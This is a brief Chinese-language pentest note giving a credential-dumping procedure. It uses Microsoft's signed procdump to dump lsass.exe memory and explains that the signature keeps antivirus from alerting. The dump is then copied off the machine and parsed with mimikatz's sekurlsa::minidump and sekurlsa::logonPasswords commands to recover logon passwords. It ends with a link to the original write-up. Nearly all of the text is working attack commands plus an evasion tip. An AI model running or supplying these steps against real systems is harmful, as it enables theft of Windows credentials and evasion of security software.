使用procdump,由于是微软的东西,带微软签名杀软不会报毒。
procdump -accepteula -ma lsass.exe lsass.dmp
copy出 lsass.dmp到本机。
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords
具体可以参考原文:
http://blog.gentilkiwi.com/securite/mimikatz/minidump